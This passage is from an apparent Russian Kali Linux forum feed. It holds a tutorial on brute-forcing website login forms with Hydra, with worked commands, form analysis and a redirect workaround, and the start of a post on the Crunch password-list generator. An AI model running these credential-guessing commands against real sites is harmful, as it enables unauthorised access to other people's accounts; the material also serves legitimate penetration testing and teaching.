и пароли будут символизируют заполнители &quot;&lt;b&gt;^USER^&lt;/b&gt;&quot; и &quot;&lt;b&gt;^PASS^&lt;/b&gt;&quot; (параметры формы).&lt;br /&gt;&lt;br /&gt;Третье - это строка, которая проверяет на *неверный* логин (по умолчанию).&lt;br /&gt;&lt;br /&gt;Строке, соответствующей условию введения неверных учётных данных может предшествовать строка &quot;&lt;b&gt;F=&lt;/b&gt;&quot;, строке, соответствующей условию введения верных учётных данных должна предшествовать &quot;&lt;b&gt;S=&lt;/b&gt;&quot;.&lt;br /&gt;&lt;br /&gt;Здесь многие ошибаются. Вы должны проверить веб-приложение, на что похожа строка, выдаваемая при неверных учётных данных и скопировать её в этот параметр!&lt;br /&gt;&lt;br /&gt;Следующие параметры опциональные:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;C=/page/uri&lt;/b&gt; определяет другую страницу для сбора базовых куки&lt;br /&gt;&lt;b&gt;(h|H)=My-Hdr&amp;#92;: foo&lt;/b&gt; для отправки заданных пользователем HTTP заголовка при каждом запросе&lt;br /&gt;&lt;b&gt;^USER^&lt;/b&gt; и &lt;b&gt;^PASS^&lt;/b&gt; также могут быть внесены в этот заголовок!&lt;br /&gt;Справка: &apos;h&apos; добавит заданный пользователем заголовок в конец не обращая внимания, был ли он уже отправлен Hydra или нет.&lt;br /&gt;&lt;br /&gt;&apos;&lt;b&gt;H&lt;/b&gt;&apos; заменит значение существующего заголовка той строкой, которая задана пользователем или добавит заголовок в конец&lt;br /&gt;&lt;br /&gt;Обратите внимание, что если вам нужно двоеточие (&lt;b&gt;:&lt;/b&gt;) в ваших заголовках, то его нужно экранировать обратным слэшем (&lt;b&gt;&amp;#92;&lt;/b&gt;).&lt;br /&gt;&lt;br /&gt;Все двоеточия, которые не являются разделителями опций, должны быть экранированы (смотрите примеры выше и ниже).&lt;br /&gt;&lt;br /&gt;Вы можете задать заголовок без экранирования двоеточий, но таким образом вы не сможете разместить двоеточия в самих значениях заголовка, поскольку они будут интерпретироваться в hydra как разделители.&lt;br /&gt;&lt;br /&gt;Примеры:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&quot;/login.php:user=^USER^&amp;pass=^PASS^:incorrect&quot;&lt;br /&gt; &lt;br /&gt;&quot;/login.php:user=^USER^&amp;pass=^PASS^&amp;colon=colon&amp;#92;:escape:S=authlog=.*success&quot;&lt;br /&gt; &lt;br /&gt;&quot;/login.php:user=^USER^&amp;pass=^PASS^&amp;mid=123:authlog=.*failed&quot;&lt;br /&gt; &lt;br /&gt;&quot;/:user=^USER&amp;pass=^PASS^:failed:H=Authorization&amp;#92;: Basic dT1w:H=Cookie&amp;#92;: sessid=aaaa:h=X-User&amp;#92;: ^USER^&quot;&lt;br /&gt; &lt;br /&gt;&quot;/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F&lt;target&gt;%2Fexchange&amp;flags=0&amp;username=&lt;domain&gt;%5C^USER^&amp;password=^PASS^&amp;SubmitCreds=x&amp;trusted=0:reason=:C=/exchweb&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Полная команда для &lt;b&gt;брутфорса сайтов с Hydra&lt;/b&gt; выглядит примерно так:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -L logins.txt -P passwords.txt http-post-form://example.org/ -m &quot;/signin.php:login_username=^USER^&amp;login_password=^PASS^:Please login&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Подробнее об элементах:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;-L logins.txt -P passwords.txt&lt;/b&gt; - это имена пользователей и пароли, как их можно задать рассказывается в первой части — если вы не понимаете этот фрагмент, то начните чтение с первой части.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;http-post-form&lt;/b&gt; - это протокол, точнее говоря, это указание на то, что брутфорсится форма ввода (form) сайта (http), которая отправляет параметры методом POST (post).&lt;br /&gt;&lt;br /&gt;Вместо http-post-form может быть указан &lt;b&gt;http-get-form&lt;/b&gt; - в случае, если форма отправляет параметры методом GET.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;example.org&lt;/b&gt; - адрес сайта для подбора паролей&lt;br /&gt;&lt;br /&gt;&lt;b&gt;-m&lt;/b&gt; - ключ, который говорит о том, что сейчас будет передана специальная опция для модуля (в данном случае для модуля http-post-form)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&quot;/signin.php:login_username=^USER^&amp;login_password=^PASS^:Please login&quot;&lt;/b&gt; - эта и есть передаваемая опция, уберём кавычки и разделим её на три части, разделителем служит двоеточие&lt;br /&gt;&lt;br /&gt;&lt;b&gt;/signin.php&lt;/b&gt; - адрес страницы, куда передаются данные формы, должен начинаться со слеша&lt;br /&gt;&lt;br /&gt;&lt;b&gt;login_username=^USER^&amp;login_password=^PASS^&lt;/b&gt; - это строка, которая передаётся форме. О ней подробнее рассказывалось чуть выше. &lt;b&gt;^USER^&lt;/b&gt; - это заполнитель, который будет заменяться на имя пользователя. &lt;b&gt;^PASS^&lt;/b&gt; - это заполнитель для пароля.&lt;br /&gt;&lt;br /&gt;Слова &lt;b&gt;login_username&lt;/b&gt; и &lt;b&gt;login_password&lt;/b&gt; - это названия полей формы, они у каждой формы свои, их нужно задавать самому.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Please login&lt;/b&gt; - это строка, которую hydra будет искать в присланном от сайта ответе после введения учётных данных. Если эта строка присутствует, значит попытка аутентификация провалилась, учётные данные неверны и нужно пробовать следующие логины и пароли. Если эта строка отсутствует, значит произошёл вход. Эта строка индивидуальна для каждого сайта и вам самостоятельно нужно её выявлять и задавать.&lt;br /&gt;&lt;br /&gt;Как видно, достаточно запутанно, плюс к этому, есть ещё и подводные камни. Давайте будем разбираться на конкретных примерах.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Как ввести данные в Hydra для перебора пароля на сайте&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Рассмотрим на примере конкретного сайта. Форму можно исследовать двумя способами - статическим и динамическим. Давайте рассмотрим оба способа последовательно.&lt;br /&gt;&lt;br /&gt;Дан сайт с адресом &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/ggVlDg&quot; title=&quot;https://example.org/.&quot; rel=&quot;nofollow&quot;&gt;https://example.org/.&lt;/a&gt; На этом сайте есть форма для ввода пароля:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;form method=&quot;post&quot; enctype=&quot;application/x-www-form-urlencoded&quot; action=&quot;?signin&quot; style=&quot;margin: 10px;&quot;&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;table&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;tr&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;label&gt;Имя&lt;/label&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;input type=&quot;text&quot; style=&quot;font-size: 11px&quot; name=&quot;login_username&quot; size=&quot;10&quot; value=&quot;Имя&quot; onfocus=&quot;if (this.value == &apos;Имя&apos;&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;this.value = &apos;&apos;;&quot; /&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;&lt;br /&gt; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;tr&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;label&gt;Пароль&lt;/label&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;input type=&quot;password&quot; style=&quot;font-size: 11px&quot; name=&quot;login_password&quot; size=&quot;10&quot; /&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;&lt;br /&gt; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;tr&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;label&gt;&lt;input type=&quot;checkbox&quot; name=&quot;cookieuser&quot; value=&quot;1&quot; checked=&quot;checked&quot; /&gt;Запомнить?&lt;/label&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;td&gt;&lt;input type=&quot;submit&quot; value=&quot;Вход&quot; title=&quot;Введите Ваше имя пользователя и пароль, чтобы войти, или нажмите кнопку &apos;Регистрация&apos;, чтобы зарегистрироваться.&quot; /&gt;&lt;/td&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/table&gt;&lt;br /&gt;&lt;/form&gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Задача - составить команду для hydra под эту форму.&lt;br /&gt;&lt;br /&gt;В форме видим строку&lt;br /&gt;&lt;br /&gt;&lt;b&gt;method=&quot;post&quot;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Значит будем использовать метод http-post-form, итак, начнёт писать нашу команду:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l 111111 -p 222222 http-post-form://example.org&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;111111&lt;/b&gt; и &lt;b&gt;222222&lt;/b&gt; - это предполагаемое имя и пароль пользователя (можно указать файлы для перебора)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;http-post-form&lt;/b&gt; - это указание на используемый модуль (на используемый протокол)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;example.org&lt;/b&gt; - это адрес сайта (обязательно без конечного слэша).&lt;br /&gt;&lt;br /&gt;Теперь нам нужно составить строку, состоящую из трёх величин, разделённых двоеточием&lt;br /&gt;&lt;br /&gt;&quot;&lt;span style=&quot;color:#38761D&quot;&gt;адрес_страницы_куда_отправляются_данные_из_формы:&lt;/span&gt;&lt;span style=&quot;color:#3c78d8&quot;&gt;передаваемая_в_форму_строка:&lt;/span&gt;&lt;span style=&quot;color:#85200C&quot;&gt;строка_которую_ищем_в_ответе&lt;/span&gt;&quot;&lt;br /&gt;&lt;br /&gt;Глядя на форму мы видим, что она свои данные передаёт на страницу &lt;b&gt;?signin&lt;/b&gt; - поставим перед ним слеш и первый элемент строки готов:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/?signin&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Форма содержит следующие поля: &lt;b&gt;login_username, login_password, cookieuser&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;login_username передаёт имя пользователя, т.е. ^USER^, поэтому login_username=^USER^, login_password передаёт пароль пользователя, т.е. поэтому ^PASS^ login_password=^PASS^, есть есть cookieuser, присвоим ей статичную величину cookieuser=1, теперь полученные отрезки объединяем символом &amp;:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Теперь третий элемент - то, что мы будем искать в ответе. Например, в форме есть строка «&lt;b&gt;Введите Ваше имя пользователя и пароль&lt;/b&gt;». Практически наверняка после входа на сайт эта строка не отображается - поскольку она больше не нужна. Поэтому мы выбираем её для поиска: если она найдена, перебор будет продолжаться, если в ответе нет этой строки, значит мы успешно вошли, т. е. угадали логин и пароль.&lt;br /&gt;&lt;br /&gt;Ещё можно попробовать ввести любые учётные и посмотреть на ошибку, которую выдаёт веб-сайт. Эту ошибку (часть этой строки) и нужно использовать.&lt;br /&gt;&lt;br /&gt;Т.е. мы составили три подстроки, исходя из анализа формы:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/?signin&lt;br /&gt;login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1&lt;br /&gt;Введите Ваше имя пользователя и пароль&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Объединим эти строки, разделив их двоеточием:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/?signin:login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1:Введите Ваше имя пользователя и пароль&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Эту строку нужно взять в двойные кавычки и перед ней поставить ключ -m. Т.е. наша строка для брутфорса теперь выглядит так:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l 111111 -p 222222 http-post-form://example.org -m &quot;/?signin:login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1:Введите Ваше имя пользователя и пароль&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Для большинства сайтов этот алгоритм будет работать.&lt;br /&gt;&lt;br /&gt;Но для конкретного этого сайта, даже при подстановке верных учётных данных hydra не может распознать, что пароль подобран. Это первый подводный камень:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Hydra и проблема для сайтов с редиректом&lt;/span&gt;&lt;/b&gt; &lt;br /&gt;Для анализа проблемы я буду использовать ключ &lt;b&gt;-d&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l 111111 -p 222222 http-post-form://example.org -m &quot;/?signin:login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1:Введите Ваше имя пользователя и пароль&quot; -d&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Вот часть из сообщения отладки:&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/crunch_info/hydra1.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/crunch_info/hydra1-200.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Это то, что отправляет сервер в ответ на попытку авторизации. Оказывается, никакие сообщения об ошибке не показываются, вообще ничего не показывается - происходит только редирект.&lt;br /&gt;&lt;br /&gt;Повторюсь, такие ситуации не часты - скорее, это исключения. «Нормальные» сайты показывают нам нормальные сообщения об ошибках. В крайнем случае, даже при редиректе можно попытаться найти какое-то отличие в ответах для заголовков при верной и при ошибочной авторизации.&lt;br /&gt;&lt;br /&gt;Например, т. к. для рассматриваемого сайта я знаю верные учётные данные, то я могу ввести их и, оставаясь в режиме отладки, посмотреть на разницу вывода:&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/crunch_info/hydra2.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/crunch_info/hydra2-200.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Ну можно кричать «ура!», заголовок ответа другой - при вводе верных учётных данных устанавливается куки, т. е. нам нужно искать строку &lt;b&gt;Set-Cookie&lt;/b&gt;. Причём, если эта строка есть — значит всё прошло успешно. Перед этой строкой мы поставим &lt;b&gt;S=&lt;/b&gt;, это даст указание hydra, что если строка найдена, то это успех, а не провал:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l 111111 -p 222222 http-post-form://example.org -m &quot;/?signin:login_username=^USER^&amp;login_password=^PASS^&amp;cookieuser=1:S=Set-Cookie&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;a class=&quot;link&quot; href=&quot;http://usehelp.org/load_files/images/crunch_info/hydra3.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://usehelp.org/load_files/images/crunch_info/hydra3-200.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;/&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Всё работает, при вводе ложных данных, hydra понимает, что данные ложные. А при вводе верных данных — понимает, что имя и пароль угаданы.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Все сайты разные, и для каждого движка нужно тестировать, прежде чем начинать атаку.&lt;/b&gt;</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-19-1</guid>
		</item>
		<item>
			<title>Crunch - генератор паролей</title>
			<link>https://usehelp.clan.su/forum/17-18-1</link>
			<pubDate>Sun, 27 Mar 2016 19:08:34 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: Crunch - генератор словарей с паролями&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>Особенности:&lt;br /&gt;&lt;br /&gt;1) crunch генерирует списки слов (WordList) как методом комбинации, так и методом перестановки&lt;br /&gt;2) он может разбить вывод по количеству строк или размеру файла&lt;br /&gt;3) поддерживается возобновление процесса после остановки&lt;br /&gt;4) образец (паттерн) поддерживает числа и символы&lt;br /&gt;5) образец поддерживает по отдельности символы верхнего и нижнего регистра&lt;br /&gt;6) работая с несколькими файлами, выводит отчёт о статусе&lt;br /&gt;7) новая опция -l для буквальной поддержки, @,% ^&lt;br /&gt;8) новая опция -d для ограничения дублирования символов, смотрите man-файл для деталей&lt;br /&gt;9) поддержка unicode&lt;br /&gt;&lt;br /&gt;В методах взламывания пароля, WordList (список слов) - один из самых важных файлов. В этом списке созданы все возможные комбинации пароля.&lt;br /&gt;&lt;br /&gt;Методы взламывания пароля бывают:&lt;br /&gt;&lt;br /&gt;1. Dictionary attack&lt;br /&gt;&lt;br /&gt;Перебор по словарю. Словари содержат наиболее часто используемые пароли. Плюсами данной атаки является повышение шанса подобрать пароль при значительной экономии времени. Минус — не даёт 100% уверенности в подборе пароля.&lt;br /&gt;&lt;br /&gt;2. Brute Force Attack&lt;br /&gt;&lt;br /&gt;Плюс — если перебрать все возможные комбинации, то можно говорить 100% уверенности о взломе пароля. Минус — необходимость большого количества ресурсов (вычислительных мощностей и времени).&lt;br /&gt;&lt;br /&gt;3. Hybrid Attack&lt;br /&gt;&lt;br /&gt;Работа ведётся по словарю, но добавляются некоторые числа и символы к словам.&lt;br /&gt;&lt;br /&gt;4. Syllable Attack&lt;br /&gt;&lt;br /&gt;Это — комбинация brute force attack и dictionary attack.&lt;br /&gt;&lt;br /&gt;5. Rule-Based Attack&lt;br /&gt;&lt;br /&gt;Нападение, основанное на правилах. Используется, когда нападавший получает некоторую информацию о пароле.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color:#980000&quot;&gt;&lt;b&gt;Использование crunch&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Простой пример использования:&lt;br /&gt;&lt;br /&gt;crunch &lt;минимальная-длина&gt; &lt;максимальная-длина&gt; [набор символов]&lt;br /&gt;&lt;br /&gt;Например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; 